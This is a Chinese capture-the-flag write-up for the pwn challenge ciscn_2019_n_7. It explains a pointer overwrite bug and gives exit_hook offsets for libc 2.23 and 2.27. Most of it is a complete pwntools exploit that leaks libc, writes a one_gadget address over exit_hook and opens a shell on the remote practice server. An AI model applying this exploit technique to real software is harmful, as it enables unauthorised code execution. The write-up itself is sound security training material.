其他分享
首页 > 其他分享> > ciscn_2019_n_7(exit_hook)

ciscn_2019_n_7(exit_hook)

作者:互联网

又学到了一个新知识

题目的例行检查我就不放了

关键漏洞

 

 可以看到我们申请的chunk在v1[2】处,这里存放着chunk的地址指针,但是read确实从v1+1开始输入值,说明我们可以去覆盖这个地址

这道题我们利用exit_hook

首先先说一下exit_hook的地址(并不是调用exit_hook,而是在exit中使用到的地址)

在libc-2.23中
exit_hook = libc_base+0x5f0040+3848

exit_hook = libc_base+0x5f0040+3856

在libc-2.27中

exit_hook = libc_base+0x619060+3840

exit_hook = libc_base+0x619060+3848

  这样一来,只要知道libc版本和任意地址的写,我们可以直接写这个指针,执行exit后就可以拿到shell了。(其实不用非要执行exit,就程序正常返回也可以执行到这里)

这道题目我不知道为什么有点坑,本地和远程泄露的地址去获得基地址的方式是不一样的

from pwn import *

#p = process('./ciscn_2019_n_7')
p = remote('node4.buuoj.cn',25004)
libc = ELF('./libc-2.23.so')

def lounch_gdb():
    context.terminal = ['xfce4-terminal','-x','sh','-c']
    gdb.attach(proc.pidof(p)[0])

def add(size,name):
    p.sendlineafter('choice-> ','1')
    p.sendlineafter('Length: ',str(size))
    p.sendafter('name:\n',name)
    

def edit(name,contents):
    p.sendlineafter('choice-> \n','2')
    p.sendafter('name:\n',name)
    p.sendafter('contents:\n',contents)

def leak():
    p.sendlineafter('choice->','666')

leak()
lounch_gdb()
p.recvuntil('0x')
libc_info = int(p.recvuntil('\n'),16)
libc_base = libc_info - libc.symbols['puts']
#libc_base = libc_info - 0x6f6a0
print('libc_base-->'+hex(libc_base))
exit_hook = libc_base + 0x5f0040+3848
print('exit_hook-->'+hex(exit_hook))
one_gadget = libc_base + 0xf1147
print('one_gadget-->'+hex(one_gadget))
add(0x30,b'a'*8+p64(exit_hook))

edit('aaaaaaaa',p64(one_gadget))
sleep(0.5)
p.sendline('a')

p.interactive()

 以后应该还会碰到这种题,虽然这道题不难,但是需要记录一下

感谢师傅的文章:

exit_hook在pwn题中的应用 - 不会修电脑 - 博客园 (cnblogs.com)

结束!

 

标签:ciscn,libc,hook,地址,base,2019,exit,name
来源: https://www.cnblogs.com/zhuangzhouQAQ/p/15798699.html